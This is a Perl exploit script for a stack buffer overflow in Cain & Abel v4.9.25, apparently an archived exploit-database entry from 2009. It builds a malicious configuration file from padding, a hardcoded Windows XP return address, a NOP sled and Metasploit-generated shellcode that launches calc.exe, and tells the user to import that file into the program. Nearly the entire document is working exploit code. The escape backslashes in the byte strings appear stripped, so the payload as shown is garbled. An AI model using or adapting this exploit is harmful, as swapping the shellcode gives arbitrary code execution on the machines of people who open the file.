#!perl -w
# Simple overflow for Cain & Abel v4.9.25 (and below?)
# This script will output a file; import this file as a 
# config file under Cracker -> Cisco IOS-MD5 Hashes
#
# If Cain crashes but calc.exe isn't run, change $eip to reflect
# your system.
#
# send9 /at/ chiseclabs.com

use strict;

my $eip = "xD8x69x83x7C"; # 0x7C8369D8 - kernel32.dll, call esp (WinXP SP2)
my $nop = "x90" x 4;
my $pad = "A" x 100;

# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54".
"x42x50x42x30x42x50x4bx48x45x44x4ex53x4bx58x4ex57".
"x45x50x4ax47x41x30x4fx4ex4bx58x4fx44x4ax31x4bx58".
"x4fx35x42x32x41x30x4bx4ex49x44x4bx48x46x53x4bx48".
"x41x50x50x4ex41x43x42x4cx49x59x4ex4ax46x38x42x4c".
"x46x57x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e".
"x46x4fx4bx43x46x45x46x52x46x50x45x47x45x4ex4bx48".
"x4fx55x46x52x41x50x4bx4ex48x56x4bx58x4ex50x4bx54".
"x4bx58x4fx35x4ex51x41x50x4bx4ex4bx58x4ex31x4bx38".
"x41x30x4bx4ex49x58x4ex55x46x32x46x30x43x4cx41x43".
"x42x4cx46x46x4bx38x42x44x42x53x45x38x42x4cx4ax47".
"x4ex30x4bx38x42x34x4ex30x4bx58x42x47x4ex51x4dx4a".
"x4bx48x4ax56x4ax50x4bx4ex49x50x4bx48x42x38x42x4b".
"x42x30x42x30x42x30x4bx48x4ax46x4ex33x4fx35x41x33".
"x48x4fx42x46x48x55x49x38x4ax4fx43x58x42x4cx4bx47".
"x42x35x4ax56x42x4fx4cx38x46x50x4fx55x4ax36x4ax49".
"x50x4fx4cx58x50x30x47x35x4fx4fx47x4ex43x46x41x36".
"x4ex46x43x46x50x32x45x56x4ax37x45x56x42x30x5a";

my $b00m = $pad . $eip . $nop . $shellcode;

open(BOF,">cain_ios_ex.conf") or die "Error: Can't open a file for writingn";
print BOF $b00m;
close(BOF);

print "Now just open cain_ios_ex.conf as a configuration file under Cracker -> Cisco IOS-MD5 Hashes.n";

# www.Syue.com [2009-01-07]